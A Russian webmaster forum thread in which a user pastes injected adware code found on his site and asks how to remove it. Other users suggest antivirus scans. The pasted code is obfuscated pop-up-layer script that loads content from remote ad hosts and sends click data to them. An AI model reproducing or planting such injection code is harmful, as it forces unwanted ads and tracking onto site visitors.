Форум Сайтостроение Веб-строительство

Помогите Вирус :)

R
На сайте с 13.06.2009
Offline
47
recrut
817

Такая беда. Время от времени на различных сайтах (и на моих) показывается всплывающий слой с рекламой долбаной социалки (sysion).

Суть в том, что она появляется даже там где ее просто быть не может (Sape, liex) и тому подобные. Хотя возможно это глюк, но я не думаю.

Стал сегодня просматривать один свой сайтек (dle).

Нашел вот такое дерьмо: 

<iframe src="http://89.108.95.67/ad.php?w=160&amp;h=600" scrolling="no" frameborder="0" height="600" width="160"></iframe><script type="text/javascript" src="http://89.108.95.67/binlayer.php"></script><script type="text/javascript" src="http://bin-layer.ru/layer-2045-1.js"></script><div id="o858bf1613554d9b728f900af408386318153c7fd" style="position: fixed; width: 833px; height: 517px; top: 20px; left: 11px; z-index: 100000; display: block;">



				<div style="background-color: rgb(34, 56, 105); border: 3px solid rgb(59, 105, 164); width: 100%; height: 100%; text-align: center; z-index: 100001;">

					<div style="margin-top: 7px; height: 18px; text-align: left; z-index: 100002;">

						<span style="margin-left: 14px; width: 250px; float: left;">

							<a href="" target="_blank" style="color: rgb(255, 255, 255); text-decoration: none; font-weight: bold; font-family: Arial; font-size: 11px;"></a>



						</span>

						<span style="margin-right: 14px; float: right;">

							<a href="#" onclick="return o95e6aed9f437d2ae3aa8d6039c6347bd81a9ec96();" style="color: rgb(255, 255, 255); text-decoration: none; font-weight: bold; font-family: Arial; font-size: 11px;">Maximize</a><span style="font-family: Arial; font-size: 11px; color: rgb(255, 255, 255);"> / </span><a href="#" onclick="return oca57219232e81357a0dd10a3d29235ada251ee4e();" style="text-decoration: none; color: rgb(255, 255, 255); font-family: Arial; font-size: 11px;">Close [x]</a>

						</span>



					</div>

					<div style="margin: 0pt auto; width: 797px; height: 465px; border: 7px solid rgb(59, 105, 164); z-index: 100002;">



						<iframe style="border: 0px none; margin: 0px; padding: 0px; z-index: 100003;" src="http://lan.bin-layer.de/landingpages/saysion/4/index.php" name="o83f085a013ffa24a3ac1f04ef3407c087f8cebaa" id="o83f085a013ffa24a3ac1f04ef3407c087f8cebaa" scrolling="no" frameborder="0" height="100%" width="100%"></iframe>

					</div>

					<span style="margin-left: 14px; width: 250px; float: left;">

							<a href="" target="_blank" style="color: rgb(255, 255, 255); text-decoration: none; font-weight: bold; font-family: Arial; font-size: 11px;">For Webmaster: Earn more Money!</a>

						</span>

				</div>

			</div>



			<script type="text/javascript">

				var _Element = new Array(); var links;



				function _GetTopElement() {

					thebody = document.getElementsByTagName('div');

					if(thebody.length > 0) {  return document; }  else {  return document.parentElement; }

				}



				function _LayerMove(links) {

					o8502e57f8234eed895acf15b96f7e15261a89256.style.display = 'block';

					links -= 50;

					o8502e57f8234eed895acf15b96f7e15261a89256.style.top = links + "px";

					o8502e57f8234eed895acf15b96f7e15261a89256.style.left = "11px";

					if (links > 11){

						setTimeout("_LayerMove("+links+")", 20);

					} else {

						o8502e57f8234eed895acf15b96f7e15261a89256.style.top = "20px"; }

					}



				function _GetLeft(fal) {

					if (fal.offsetParent) {  return (fal.offsetLeft + _GetLeft(fal.offsetParent)); }  else {  return (fal.offsetLeft); }

				}



				function _GetTop(fal) {

					if (fal.offsetParent) {  return (fal.offsetTop + _GetTop(fal.offsetParent)); }  else {  return (fal.offsetTop); }

				}



				function o21131fb4e87a59d4f37ad58c50337637db03c39a(){

					if (document.getElementsByTagName){

						var scripttags = document.getElementsByTagName("script");for (i=0; i < scripttags.length; i++){if (scripttags.src.search(/euros4click.de/gi) != -1){return 'Euros4click';}if (scripttags.src.search(/layer-ads.de/gi) != -1){return 'Layer-Ads';}if (scripttags.src.search(/media.funpic.de/gi) != -1){return 'FunPic';}if (scripttags.src.search(/sponsorads.de/gi) != -1){return 'SponsorAds';}if (scripttags.src.search(/layerads.de/gi) != -1){return 'Layer-Ads';}if (scripttags.src.search(/propaid.de/gi) != -1){return 'Propaid';}	}

					}return 'x';



				}



				function oca57219232e81357a0dd10a3d29235ada251ee4e() {

					_HideAnimation('10');

					var Fake = o21131fb4e87a59d4f37ad58c50337637db03c39a();

					document.getElementById ('o83f085a013ffa24a3ac1f04ef3407c087f8cebaa').src = "http://bin-layer.ru/all/standart_click.php?t=NDAwMCYyNDUmJjIwUzg9NXlkdGJ5ZUdsMjVwb3ZMMGNEYUhSMjMmdGVkdmdyJmtyJjQxMjA4NjAmNTQ0NzU1IDEyMTAwNzcwLjc5OCYwN2UwYzU1NGNkZGQ4NzIxMjBmMDU5ZmQ2YTBjODU5Y2I1NzBhM2ExMDcmYzM5OTFmZmExZmM5M2NiNjNjZDdmNTI4M2QyN2Y4MTIzMDA3MjI3ODE4&land=un"+'&fake='+Fake;



					return false;

				}



				function o95e6aed9f437d2ae3aa8d6039c6347bd81a9ec96() {

					_HideAnimation('10');



					 window.open ('http://www.saysion.com/index5');



					document.getElementById ('o83f085a013ffa24a3ac1f04ef3407c087f8cebaa').src = "http://bin-layer.ru/all/standart_click.php?t=NDAwMCYyNDUmJjIwUzg9NXlkdGJ5ZUdsMjVwb3ZMMGNEYUhSMjMmdGVkdmdyJmtyJjQxMjA4NjAmNTQ0NzU1IDEyMTAwNzcwLjc5OCYwN2UwYzU1NGNkZGQ4NzIxMjBmMDU5ZmQ2YTBjODU5Y2I1NzBhM2ExMDcmYzM5OTFmZmExZmM5M2NiNjNjZDdmNTI4M2QyN2Y4MTIzMDA3MjI3ODE4&land=un&max=1";

					return false;

				}



				function _HideAnimation(left) {

					if(left > -800)  {    left -= 200;

						o8502e57f8234eed895acf15b96f7e15261a89256.style.left = left;

						setTimeout("_HideAnimation(" + left + ")", 50);

					}  else  {

						o8502e57f8234eed895acf15b96f7e15261a89256.style.display = 'none';

						o8502e57f8234eed895acf15b96f7e15261a89256.style.left = '-5000';

						o8502e57f8234eed895acf15b96f7e15261a89256.style.top = '-5000';

					}

				}



				function _Update() {

					if(document.all) {

						if (document.documentElement && document.documentElement.scrollTop) {

							_Pos = document.documentElement.scrollTop

						} else if (document.body) {

							_Pos = document.body.scrollTop

						}



						if('top'=='left'){ o8502e57f8234eed895acf15b96f7e15261a89256.style.top = _Pos + 10 + 'px'; }



						setTimeout("_Update()", 1);

					}  else {

						o8502e57f8234eed895acf15b96f7e15261a89256.style.position = 'fixed';

					}

				}



				function _StartAd() {

					document.getElementById('o83f085a013ffa24a3ac1f04ef3407c087f8cebaa').src = "http://lan.bin-layer.de/landingpages/saysion/4/index.php";

					_Update();

					setTimeout("_LayerMove(1800)", 2600);

					(new Image()).src = AdLink;



				}



					if(screen.availWidth > 800) {  width = '800'; }  else { width = '700'; }



					var o8502e57f8234eed895acf15b96f7e15261a89256 = document.getElementById('o858bf1613554d9b728f900af408386318153c7fd');

					var AdLink = "http://loveplanet.ru/a-main/affiliate_id-43780/";



					_StartAd();

				</script>

Прием хочу отметить, что в коде страницы (в Лисе смотрю) его кабы и нет, а найти его можно только если выделить его (как текст на странице) а потом посмотреть исходник выделенного куска.

Потом, я полез на ftp смотреть сам сайт (шаблон и т.д.). Запустил поиск по всем файлам (искал это bin-layer.ru) и еще пару кусочков из их кода. Нечего такого нет.

Значит это на компе. Стал искать (касперский) тоже нет нечего.

У кого не то было такое, а главное как поправить. Может кто знает, а то уже надоело?

P.S. Я вот чего подумал. Я частенько выхожу в нет через проксик друга (мы с ним в одной локалке). Может быть такое, что заражон его комп и мне собственно передается, помимо страницы еще и навешенная реклама?

bbk06
На сайте с 09.05.2010
Offline
68
bbk06
#1

Поиск рулит

[Удален]
#2
recrut:
Значит это на компе. Стал искать (касперский) тоже нет нечего.

Это на компе. Установите новый Аваст и просканите все - поможет.

R
На сайте с 13.06.2009
Offline
47
recrut
#3
bbk06:
Поиск рулит

Так я же и пишу что искал 😂

Запустил поиск по всем файлам (искал это bin-layer.ru) и еще пару кусочков из их кода. Нечего такого нет.
Значит это на компе. Стал искать (касперский) тоже нет нечего.

P.S. Я вот чего подумал. Я частенько выхожу в нет через проксик друга (мы с ним в одной локалке). Может быть такое, что заражон его комп и мне собственно передается, помимо страницы еще и навешенная реклама?

Это отпадает. Он сказал, что у него такого нет.

Ну, то может кто ткнет носом где искать и по какому запросу. Плиз!

recrut добавил 03.06.2010 в 14:17

zagred:
Это на компе. Установите новый Аваст и просканите все - поможет.

Большое спасибо сейчас попробую.

R
На сайте с 24.01.2008
Offline
180
Алексей
#4

стучите в асю

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
[Удален]
#5

Rxp, у него вирус на компе 100%.

T
На сайте с 13.01.2009
Offline
50
Troytft
#6

Нечего по сайтам подозрительным лазить

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий